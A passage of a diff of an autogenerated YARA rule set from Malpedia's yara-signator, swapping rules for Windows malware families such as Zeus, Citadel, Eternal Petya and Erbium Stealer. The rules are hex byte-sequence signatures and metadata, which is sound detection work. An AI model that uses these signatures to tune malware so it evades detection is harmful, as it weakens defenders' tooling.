ffd0 } + $sequence_15 = { 4c8b4928 4c8b4120 488b5118 4889442438 488b4140 } + $sequence_16 = { 488b4148 4c8b11 4c8b4928 4c8b4120 } + $sequence_17 = { 4889442430 488b4138 4889442428 488b4130 } + $sequence_18 = { 488b5118 4889442440 488b4148 4889442438 488b4140 } + $sequence_19 = { 4889442438 488b4140 4889442430 488b4138 } + $sequence_20 = { 6820bf0200 68905f0100 68905f0100 50 ff15???????? } + $sequence_21 = { 2bc2 d1e8 03c2 c1e806 6bc05f } + $sequence_22 = { 83780400 7404 8b4008 c3 } + $sequence_23 = { 51 68e9fd0000 50 e8???????? } + $sequence_24 = { 6a40 6800300000 6a70 6a00 } + $sequence_25 = { 833800 751c 83781000 7516 } + $sequence_26 = { c3 6a01 ff15???????? 50 } + $sequence_27 = { 8b01 59 03d0 52 } + $sequence_28 = { 85c0 7f0b e8???????? 8b05???????? } + $sequence_29 = { 03d0 52 ebdc 89450c } + $sequence_30 = { 8bc1 66ad 85c0 741c } + $sequence_31 = { e8???????? 83f801 7411 ba0a000000 } + $sequence_32 = { 85c0 741c 3bc1 7213 } + $sequence_33 = { 7405 e8???????? ff15???????? 8bc3 } + $sequence_34 = { c1e102 2bc1 8b00 894508 } + $sequence_35 = { 50 8b450c ff4d0c ba28000000 } + $sequence_36 = { 895510 8b4a04 ff5508 8b5510 8b4a0c } + $sequence_37 = { 2bc1 8b00 3bc7 72f2 } + $sequence_38 = { 8b4a04 ff5508 50 51 } + $sequence_39 = { ff4d0c ba28000000 f7e2 8d9500040000 03d0 895510 } + $sequence_40 = { 740f 8bc8 e8???????? 8bc3 } + $sequence_41 = { 58 41 41 41 41 } + $sequence_42 = { 8bcf e8???????? 8bf0 85ed } + $sequence_43 = { 85c0 7911 8bc8 e8???????? bb11000000 } + $sequence_44 = { e8???????? 85c0 7507 e8???????? eb5b } + $sequence_45 = { 89742428 c744242000001f00 ff15???????? 85c0 7911 } + $sequence_46 = { 7c22 3c39 7f1e 0fbec0 } + $sequence_47 = { 3bd1 0f8293000000 038e8c000000 3bd1 0f8385000000 } + $sequence_48 = { ffc1 663938 75f5 6603c9 } + $sequence_49 = { ff15???????? 8bf0 c1ee1f 83f601 } + $sequence_50 = { 85d2 745b 3bd1 0f8293000000 } + $sequence_51 = { 41 50 2bc1 8b00 } + $sequence_52 = { 8bc8 33c0 85c9 0f95c0 eb02 } + $sequence_53 = { 894504 68f0ff0000 59 8bf7 8bd7 } + $sequence_54 = { 8bc7 e8???????? 85c0 0f849f000000 } + $sequence_55 = { 8bf7 8bd7 fc 8bc1 } + $sequence_56 = { 59 50 e2fd 8bc7 } + $sequence_57 = { 8dbf00500310 8bd6 897d08 3bc8 } + $sequence_58 = { 6a00 ff15???????? 6a00 6a00 6a00 8d45dc } + $sequence_59 = { 8b7d10 2bf9 53 50 } + $sequence_60 = { 83c001 8945d4 8b4dfc 51 8b55d4 } + $sequence_61 = { 8b4dd0 894dd8 837dd840 760b 8b55d8 } + $sequence_62 = { 8d3c0e 2b75f8 33c7 2bd0 ff4dfc 75ba 8b4508 } + $sequence_63 = { 42 42 3b5508 7202 8bd6 83c104 } + $sequence_64 = { bf31e7bf31 e7bf 31e7 bf31e7bf31 e7bf } + $sequence_65 = { 8b01 3302 52 8bd0 51 03cf 51 } + $sequence_66 = { 56 57 33f6 bf???????? 833cf594f3000101 } + $sequence_67 = { 8945cc ebee 8b45d8 48 50 8b45cc 40 } + $sequence_68 = { ff75f8 ff15???????? 8945fc 837dfc00 750d } + $sequence_69 = { 6a00 6858020000 ff15???????? 837dfc00 74ce } + $sequence_70 = { e8???????? 03c6 50 e8???????? 8b7710 83c40c 2bf3 } + $sequence_71 = { 55 8bec 83ec34 c745cc00000000 6a00 685b020000 6a00 } + $sequence_72 = { 42 42 8b01 83c202 33c3 890439 } + $sequence_73 = { 8945e4 3bc6 7305 8b750c } + $sequence_74 = { 9c 000f 9c 000f 9c f7a053f7a053 } + $sequence_75 = { 8bec e8???????? 8b4d08 e8???????? 5d c20400 } + $sequence_76 = { c705????????ad380001 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 } condition: - 7 of them and filesize <99328 + 7 of them and filesize <712704 } -rule MALPEDIA_Win_Hancitor_Auto : FILE +rule MALPEDIA_Win_Badencript_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e94e88e2-da44-5855-8e98-8220d615aa1e" + id = "14e6e038-56f2-594e-a7b6-4f5872213cea" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hancitor_auto.yar#L1-L234" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badencript_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "3fe1f27a710b2ccfc55ec6a2163075344a7f89cf27a8c741d778d1b9ea2b6391" + logic_hash = "2996c0cacc073d062d9370be45e59795727eb489c538600d3d982f614b0ed8f2" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -153029,46 +155920,32 @@ rule MALPEDIA_Win_Hancitor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6824040000 6a00 6a00 6a00 } - $sequence_1 = { 6800010000 6a40 68???????? e8???????? } - $sequence_2 = { 8bec a1???????? 85c0 740c ff7508 6a00 50 } - $sequence_3 = { 8bec 8b4d08 6a00 6a01 51 } - $sequence_4 = { 68???????? ff7508 c605????????00 ff15???????? } - $sequence_5 = { a3???????? 85c0 7502 5d c3 ff7508 6a00 } - $sequence_6 = { 8b4df4 51 8b55f8 52 8b4510 } - $sequence_7 = { 8b4d08 0fbe11 83fa7d 750e } - $sequence_8 = { 8bd8 83fbff 7509 6a00 57 } - $sequence_9 = { 6a00 6a01 8b5508 52 ff55f4 33c0 8be5 } - $sequence_10 = { 8b4df4 8b5104 83ea08 d1ea 8955d4 } - $sequence_11 = { c60600 ff15???????? 8b3d???????? 85c0 740a } - $sequence_12 = { 8b4dec 8b55f4 035128 8b4518 8910 eb02 } - $sequence_13 = { 8945f8 8b4df8 894df4 6a00 6a01 } - $sequence_14 = { 7411 8d85f4fdffff 50 8b4d08 51 } - $sequence_15 = { 8b4d08 53 56 57 8b413c } - $sequence_16 = { 8945cc 8365e400 c745bc0a000000 eb07 8b45bc } - $sequence_17 = { c3 4b fd 008d4556f400 08640f08 ed fec3 } - $sequence_18 = { a1???????? 8945b4 a1???????? 83c044 a3???????? 8b45b4 83e803 } - $sequence_19 = { b9382baa99 c7458ce4f25701 ff15???????? 894da0 a1???????? } - $sequence_20 = { 6a00 6a00 ff15???????? c745a064000000 } - $sequence_21 = { c645f300 c645fc65 c645fd00 c745f8dc030000 8365b800 } - $sequence_22 = { 8945dc e9???????? b9382baa99 c745f464000000 } - $sequence_23 = { 0f8482000000 c645f301 0fb645f3 85c0 7476 a1???????? 83c044 } + $sequence_0 = { 8bfe a1???????? 897de0 394508 7c1f 3934bd48414100 } + $sequence_1 = { 8a07 8b0c9548414100 8844192e 8b049548414100 } + $sequence_2 = { 6af6 ff15???????? 8b04bd48414100 834c0318ff 33c0 eb16 e8???????? } + $sequence_3 = { 53 ffd7 83ee01 75eb 8b4dfc 33c0 } + $sequence_4 = { 8b049d48414100 8945d4 8955e8 8a5c1029 80fb02 7405 80fb01 } + $sequence_5 = { 660fd60f 8d7f08 8b048d04b54000 ffe0 f7c703000000 } + $sequence_6 = { 8b049548414100 f644082801 740b 56 e8???????? 59 } + $sequence_7 = { 0f859b010000 c745e0980f4100 8b4508 8bcf 8b7510 c745dc01000000 dd00 } + $sequence_8 = { 58 6bc000 c7809439410002000000 6a04 } + $sequence_9 = { 50 8b04bd48414100 ff743018 ff15???????? 85c0 0f95c0 5f } condition: - 7 of them and filesize <106496 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Sienna_Purple_Auto : FILE +rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cf85ec2b-384f-56db-af6a-79031e73a14e" + id = "1046d98a-4609-5bec-b876-b018dbb80d3c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sienna_purple_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dorkbot_ngrbot_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "ba62dd8b8de50fe0a193f425d94a0b3b25a4b9e54845758b6f1fb176e28dc859" + logic_hash = "bcb266c989d4cc3b19fa74f0744a29c545b0b246dcbae9914be22d057afdb410" score = 75 quality = 75 tags = "FILE" @@ -153082,34 +155959,34 @@ rule MALPEDIA_Win_Sienna_Purple_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d4e08 c645fc02 c706???????? e8???????? 8bc6 8b4df4 } - $sequence_1 = { b8e5040000 5e 5d c3 68???????? 56 e8???????? } - $sequence_2 = { e8???????? 50 8d8f84040000 e8???????? b301 8d4db0 c745fcffffffff } - $sequence_3 = { 8d5729 f30f7f4728 f30f6f4310 f30f7f4738 f30f6f4320 f30f7f4748 f30f6f4330 } - $sequence_4 = { ff5014 8d8570ffffff 8bcf 50 68???????? e8???????? 8bce } - $sequence_5 = { f30f6f40f0 660fefc8 f30f7f48f0 3bd1 72c4 8bb540ffffff 8b8d6cffffff } - $sequence_6 = { c1e81f 23c8 8b421c 35ff000000 48 c1e81f 23c8 } - $sequence_7 = { c7072e000000 e9???????? 80be2501000000 7418 8b8d84fdffff e8???????? 50 } - $sequence_8 = { eb09 50 56 8bcb e8???????? 8b4df4 64890d00000000 } - $sequence_9 = { c1c70a 0bc8 8d83dcbc1b8f 034db4 03c1 8b5de8 c1c005 } + $sequence_0 = { 6a5c 56 e8???????? 8b5d0c 6a5c 53 8bf8 } + $sequence_1 = { ffd6 33c0 a3???????? a3???????? a3???????? 8b45fc } + $sequence_2 = { c1e704 8b8f84693a02 48 3bc8 0f8289000000 68???????? 8d45ec } + $sequence_3 = { 3bc6 751a 8b00 898120100000 8b0a 8bb920100000 56 } + $sequence_4 = { 8b4508 50 8d8da4fdffff 51 68???????? 8d958cf7ffff 6817060000 } + $sequence_5 = { 8b15???????? 8b1d???????? 6a08 52 ffd3 6804010000 8906 } + $sequence_6 = { 0145fc ffd3 8bc8 b8d34d6210 f7e1 c1ea06 } + $sequence_7 = { 6689462d 83c007 66898638100000 5f 895628 c6462c03 b801000000 } + $sequence_8 = { 53 8d55d4 52 ffd6 85c0 7fdb 5f } + $sequence_9 = { 0fb6c9 6880000000 83c202 52 8b5508 f7d9 1bc9 } condition: - 7 of them and filesize <2930688 + 7 of them and filesize <638976 } -rule MALPEDIA_Win_Virut_Auto : FILE +rule MALPEDIA_Win_Moonwind_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d1cda5ac-7426-54df-b118-5de8978eea9c" + id = "27c4684d-de1d-52d3-b498-3e41ed70b3fe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virut_auto.yar#L1-L166" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moonwind_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "2bad431ccdf4fab7d1de984be24a8fafd07e087427bb72238bd9b56468720628" + logic_hash = "4c5abeb5054990236a95ce032241f8cb96582d9f2acb60b8ffe13b68b01f39ef" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -153121,40 +155998,34 @@ rule MALPEDIA_Win_Virut_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89442418 3bc3 0f8441020000 6801040000 8d8424fc050000 53 50 } - $sequence_1 = { 33f6 8bca 83c107 3bcb 7e1b } - $sequence_2 = { 0f8402010000 803f4d 0f85f9000000 807f015a } - $sequence_3 = { 6a00 59 e30a 6a0a } - $sequence_4 = { ff74241c 6a40 ff15???????? 8bf8 33c0 3bf3 } - $sequence_5 = { 8bf0 3bf3 0f8e82000000 ff74240c 57 56 } - $sequence_6 = { 51 6800040000 8d8c2404060000 51 89442428 } - $sequence_7 = { 8bcb f3a6 61 7405 } - $sequence_8 = { 8bd4 6a00 52 ff32 } - $sequence_9 = { 33d2 8bcf 52 f6d9 52 83e103 6a40 } - $sequence_10 = { 6800030084 51 51 56 } - $sequence_11 = { 49 4e 45 54 2e44 4c } - $sequence_12 = { 53 8d442444 50 8d8424e0020000 50 ffd6 } - $sequence_13 = { eb49 395c240c 7449 33c0 395c240c 7e24 } - $sequence_14 = { 6a10 59 f3ab 50 50 } - $sequence_15 = { 66ab 8d4704 ab 32e4 ac } + $sequence_0 = { 8b11 83c104 c1ea08 881430 8a51fc 40 881430 } + $sequence_1 = { 8b5dfc 895de4 8b5de4 66c7030200 8b5dfc 83c308 895de4 } + $sequence_2 = { 53 e8???????? 83c404 8b5d08 8b1b 81c390000000 895dec } + $sequence_3 = { e8???????? 83c404 83c734 33d2 83c8ff 8917 885704 } + $sequence_4 = { b801000000 eb05 b800000000 85c0 0f842f000000 8b5d08 8b1b } + $sequence_5 = { bbdc090000 e8???????? 83c410 8945b8 8b5dbc 85db 7409 } + $sequence_6 = { ff75fc 6801000000 bb68010000 e8???????? 83c410 8945f0 68???????? } + $sequence_7 = { 8965f4 8b5d08 ff33 6801000000 ff75f8 ff15???????? } + $sequence_8 = { 50 e8???????? 8d7c2434 83c9ff 33c0 83c40c f2ae } + $sequence_9 = { dc25???????? dd5dc4 6801030080 6a00 682c000000 dd45c4 e8???????? } condition: - 7 of them and filesize <98304 + 7 of them and filesize <1417216 } -rule MALPEDIA_Win_Zeus_Auto : FILE +rule MALPEDIA_Win_Ascentloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7fc58452-b8ed-5f5d-9c4b-1944a46dd13e" + id = "a27ad34c-c5db-5069-a642-46b14138c3be" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_auto.yar#L1-L231" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ascentloader_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "9dc359b19db229cc8d91a3a8afe15f58c5fe776d823ff66891a661f0a8422765" + logic_hash = "9df20341633fa22f46dd0bb0a3d7ffdb7631f541fddea2f57343c78db84232a1" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -153166,48 +156037,34 @@ rule MALPEDIA_Win_Zeus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb58 833f00 7651 8b5f08 } - $sequence_1 = { 8b3a 3b7d08 740a 40 } - $sequence_2 = { 8d443604 50 a1???????? 57 } - $sequence_3 = { 8d442440 50 8d442428 50 0fb64304 } - $sequence_4 = { 8d442448 50 ff15???????? 0fb744244e } - $sequence_5 = { 8d4c3110 81f90000a000 7715 8918 c7400400000200 89780c } - $sequence_6 = { 8918 c7400400000200 89780c ff4208 890a c645ff01 } - $sequence_7 = { 8d442460 50 e8???????? 8b4508 } - $sequence_8 = { e8???????? 84c0 7442 6a10 } - $sequence_9 = { 891d???????? 891d???????? ffd6 68???????? } - $sequence_10 = { 8bf3 6810270000 ff35???????? ff15???????? } - $sequence_11 = { 8d8db0fdffff e8???????? 8ad8 84db } - $sequence_12 = { 8ac3 5b c20800 55 8bec 83e4f8 } - $sequence_13 = { c9 c20400 55 8bec f6451802 } - $sequence_14 = { 56 ff15???????? 5e 8ac3 5b c20800 } - $sequence_15 = { 84c0 0f84ac000000 b809080002 3945f4 7713 807d0801 0f8598000000 } - $sequence_16 = { 0f86e3000000 8b03 3509080002 3d5c5b4550 740b 3d59495351 } - $sequence_17 = { c745f809080002 e8???????? 8ad8 f6450c04 7473 } - $sequence_18 = { 807b0244 7429 83fe04 0f82ec000000 8b1b 81f309080002 81fb5d515047 } - $sequence_19 = { ff35???????? e8???????? 5f 5e 8ac3 } - $sequence_20 = { 8d470c 50 c707000e0000 c7470809080002 } - $sequence_21 = { b8d5000000 e8???????? 68e6010000 68???????? 6809080002 8bc6 50 } - $sequence_22 = { 81fb5d515047 7410 81fb4f4d4156 7408 81fb59495354 7506 b364 } - $sequence_23 = { 81fb59495354 7506 b364 6a14 eb18 81fb5a5c4156 740c } + $sequence_0 = { 1bc0 f7d8 eb02 8bc3 85c0 } + $sequence_1 = { 741b 6a1a 2bf7 59 } + $sequence_2 = { 85c0 7414 8b0f e8???????? 8b4e48 e8???????? 33c0 } + $sequence_3 = { 40 001c5b 40 0023 } + $sequence_4 = { c78564ffffff76650d0a 66c78568ffffff0d0a c6856affffff00 f30f7f856cffffff 660f6f05???????? f30f7f857cffffff } + $sequence_5 = { 6a01 58 0f43f0 6a22 59 } + $sequence_6 = { 40 0038 aa 40 } + $sequence_7 = { 83f8ff 7518 ff15???????? 57 ff15???????? ff15???????? e9???????? } + $sequence_8 = { 85c0 7508 6a11 e8???????? 59 ff34f5c8484100 } + $sequence_9 = { 8d45e0 50 56 ff15???????? 8b5dec } condition: - 7 of them and filesize <319488 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Eternal_Petya_Auto : FILE +rule MALPEDIA_Win_Red_Gambler_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bf49aeac-2e4f-5384-8db1-b43fb4139322" + id = "4317a3dc-c3fe-56b3-9554-1937ca266fd2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.eternal_petya_auto.yar#L1-L162" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.red_gambler_auto.yar#L1-L292" license_url = "N/A" - logic_hash = "715ae6ddfaceb7ac967a454caeda07039960e25d99f3dc3f83571a182c2a56de" + logic_hash = "7119f21e00db57c2b9d697114a153bc44616294e27589a57d490b5463e3562f7" score = 75 - quality = 75 + quality = 71 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -153219,38 +156076,54 @@ rule MALPEDIA_Win_Eternal_Petya_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 51 57 68000000f0 } - $sequence_1 = { 53 8d4644 50 53 } - $sequence_2 = { 57 68000000f0 6a18 33ff } - $sequence_3 = { 53 6a21 8d460c 50 } - $sequence_4 = { 68f0000000 6a40 ff15???????? 8bd8 } - $sequence_5 = { 49 75f2 8b4364 034360 8b4b68 894dd4 } - $sequence_6 = { 8945d0 8bc7 8b7df8 d3e8 8b4de0 03c1 8d3c87 } - $sequence_7 = { 55 8bec 8b4d0c baff000000 } - $sequence_8 = { 8d4508 50 53 ff750c 897508 } - $sequence_9 = { 68???????? e8???????? 85c0 7403 83ce02 } - $sequence_10 = { 68e8030000 ff15???????? 3bfe 75d3 } - $sequence_11 = { 55 8bec 8b5508 53 56 57 8b721c } - $sequence_12 = { 8b07 85c0 75c3 8b75f4 } - $sequence_13 = { e8???????? 894610 895614 8bc6 5f 5e } - $sequence_14 = { 898502fcffff 8b85e8fbffff 99 81e2ff010000 } - $sequence_15 = { 56 51 ffd3 8b15???????? 56 52 8985f0fbffff } + $sequence_0 = { 807e01a2 7535 807e02c3 752f 68???????? 68???????? ff15???????? } + $sequence_1 = { 68???????? c745ece80f13fc ffd6 a3???????? } + $sequence_2 = { 68ff000000 8d8df0fcffff 51 ff15???????? 85c0 } + $sequence_3 = { 3bf1 72bf 5e 33c0 5b } + $sequence_4 = { e8???????? 8bf8 83c404 83ffff 74e1 57 8d4c244c } + $sequence_5 = { 8d4c2414 51 6a40 6a07 } + $sequence_6 = { 68???????? 68???????? ffd6 5e 85c0 7505 } + $sequence_7 = { 894dec 8955f0 8945f4 ff15???????? } + $sequence_8 = { 2b2a bee7eee947 7c26 0e } + $sequence_9 = { 8d4d98 51 ff15???????? 8d5598 52 8d8598fdffff } + $sequence_10 = { 7456 7b78 cd50 d46e } + $sequence_11 = { bc340e65bc 691fd8727fcf 14cf fd } + $sequence_12 = { 9e e779 9e 54 } + $sequence_13 = { 51 ff15???????? 83c414 6a00 6a00 8d9598fbffff } + $sequence_14 = { ff15???????? 6800010000 8d8d98fdffff 51 8d9598feffff 52 } + $sequence_15 = { 52 8d8598fdffff 50 68???????? } + $sequence_16 = { 3c3d 9e e7bd e600 3e3e25162f062d } + $sequence_17 = { 6a00 6a00 8d9598fbffff 52 68???????? 6a00 6a00 } + $sequence_18 = { 50 4c 48 44 40 6c } + $sequence_19 = { 6800010000 8d8dfcfdffff 51 6a00 } + $sequence_20 = { 68???????? 8d8d98fbffff 68???????? 51 ff15???????? 83c414 } + $sequence_21 = { 7c0e 07 642827 3ccf } + $sequence_22 = { 8d9598feffff 52 ff15???????? 8d8594fbffff 50 8d4d98 51 } + $sequence_23 = { 6800010000 8d85fcfeffff 50 6a00 ff15???????? } + $sequence_24 = { 2f 74be 6f 665b } + $sequence_25 = { 68???????? ff15???????? 8b7508 c7465c486b4000 83660800 } + $sequence_26 = { 6888130000 ffd7 6800010000 8d95fcfeffff } + $sequence_27 = { 55 8bec 8b4508 ff34c5d0814000 } + $sequence_28 = { 8bf8 ffd3 8bd8 ffd7 8b3d???????? 6aff ffd7 } + $sequence_29 = { 83f805 7d10 668b4c4310 66890c4580974000 40 ebe8 } + $sequence_30 = { 6a5c 8d8dfcfeffff 51 ff15???????? } + $sequence_31 = { 8bec 8b4508 33c9 3b04cd10804000 } condition: - 7 of them and filesize <851968 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Dripion_Auto : FILE +rule MALPEDIA_Win_Xbot_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "89e91029-adf0-5373-91d6-441ac823d2ed" + id = "4fe5918d-28da-56d9-a11a-0daee8e0859e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dripion_auto.yar#L1-L108" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xbot_pos_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "6b099e3758909dfda12afb8709370979b2c037becc9af1305c25dce794b98386" + logic_hash = "ca7b720c096face03c032566840e8484d5e37cc5bc6f6baf53fbffd9b36ce27d" score = 75 quality = 75 tags = "FILE" @@ -153264,32 +156137,32 @@ rule MALPEDIA_Win_Dripion_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd6 8bf8 ffd6 0faff8 ffd6 } - $sequence_1 = { 03f8 7402 ffd6 ffd6 } - $sequence_2 = { ffd6 8bf8 ffd6 0faff8 8d3c7f } - $sequence_3 = { 03f8 ffd6 8bd8 ffd6 0fafd8 ffd6 } - $sequence_4 = { ffd6 03f8 8d3c7f ffd6 } - $sequence_5 = { 7513 6a64 ff15???????? 68???????? } - $sequence_6 = { 8bf8 ffd6 0faff8 8d3c7f } - $sequence_7 = { ffd6 03f8 ffd6 8bd8 } - $sequence_8 = { 7402 ffd6 ffd6 ffd6 } - $sequence_9 = { ffd6 03f8 7402 ffd6 } + $sequence_0 = { 8b8d50fcffff 8d148d34935500 899558fcffff 8d8d2cfeffff e8???????? 8b8558fcffff 0fb64803 } + $sequence_1 = { 46 4c 002c46 4c } + $sequence_2 = { 83e23f 6bc230 8b0c8de0465600 8b540118 8955f4 837df4ff 7412 } + $sequence_3 = { 8d8d74fcffff e8???????? eb1f 6a00 8d8560fcffff 50 8d8decfeffff } + $sequence_4 = { 8b4d08 51 8b4df8 e8???????? 8bf0 8b4df8 } + $sequence_5 = { 837d1800 740c c785d8deffffe8905400 eb0a c785d8deffff88905400 8b85a8deffff 50 } + $sequence_6 = { f3ab 0fb64508 85c0 741b 837d0c00 7515 8b4514 } + $sequence_7 = { 8b00 50 8b4df8 e8???????? 8b08 51 8b4df8 } + $sequence_8 = { 85db 7552 68???????? 68???????? 56 6a41 68???????? } + $sequence_9 = { 8b4508 8b0c853c255600 51 ff15???????? 8b5508 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <3031040 } -rule MALPEDIA_Win_Citadel_Auto : FILE +rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cf6cb189-c7d7-5571-b2ec-c3b6f165f615" + id = "db565cb3-5b9a-5302-b069-7b70d89c0685" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.citadel_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.erbium_stealer_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "8e88ac7355b3e3defd358849e38b9e68e570cd840f3a9a1ae754cb483f4c91f5" + logic_hash = "a012e65d267d16fa63c21194de269ccb3721cbb6b9dd72f9bc3dc93b5920b64d" score = 75 quality = 75 tags = "FILE" @@ -153303,38 +156176,32 @@ rule MALPEDIA_Win_Citadel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb0e 6800800000 53 57 } - $sequence_1 = { 55 8bec ff7508 e8???????? e8???????? 5d } - $sequence_2 = { eb03 83c002 68???????? 50 ff15???????? } - $sequence_3 = { e8???????? e8???????? 5d ff25???????? 55 8bec ff7508 } - $sequence_4 = { 33c0 5f 5e c20400 55 8bec 8b4d0c } - $sequence_5 = { e8???????? 8d7c0201 8bc7 e8???????? } - $sequence_6 = { 50 e8???????? 6a44 5a 52 } - $sequence_7 = { 50 8d5dfc e8???????? 8b4dfc } - $sequence_8 = { 884601 33c0 6689460c ff4df8 } - $sequence_9 = { 8a5602 8b4e10 8a5e14 fec8 32d0 8ac2 3245fe } - $sequence_10 = { 8845fe c645ff00 763c 8a06 } - $sequence_11 = { 3aca 73fa 0fb6c9 8b04c8 ebae 32c0 5f } - $sequence_12 = { 33c0 6689460e 0fb74606 6685c0 7432 } - $sequence_13 = { 85c0 7409 3255fd 8a0f ffd0 8807 } - $sequence_14 = { 6685c0 7432 66ff460e 6639460e } - $sequence_15 = { 6639460c 7228 8b4610 8a4e05 8a5614 85c0 } + $sequence_0 = { 8b55f4 52 ff15???????? 898578ffffff 8b450c 0fb708 } + $sequence_1 = { e9???????? b808000000 6bc809 8b55f4 837c0a6400 7448 b808000000 } + $sequence_2 = { 6a04 ff7508 8d4df8 ff75e4 ff75e0 6a00 } + $sequence_3 = { 8d8424a0000000 7409 83c002 66833800 } + $sequence_4 = { 6a00 6800100000 68???????? 8b45e8 } + $sequence_5 = { ff15???????? eb08 33c0 eb04 8b442414 33ff 33db } + $sequence_6 = { 8b11 81e200000080 741a 8b45f0 8b08 81e1ffff0000 } + $sequence_7 = { 8955f8 b808000000 6bc805 8b55f4 } + $sequence_8 = { 897dfc 3bf8 7455 0fb74f2c } + $sequence_9 = { 83c102 51 8b55d0 52 ff55cc 8b4de8 8901 } condition: - 7 of them and filesize <1236992 + 7 of them and filesize <33792 } -rule MALPEDIA_Win_Cloudwizard_Auto : FILE +rule MALPEDIA_Win_Pngdowner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "429d1e4e-ef3f-5d58-8bf0-a0b83d6be71f" + id = "31e7b95d-0a01-5118-aefe-72f10c1de52f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloudwizard_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner" + source_url = 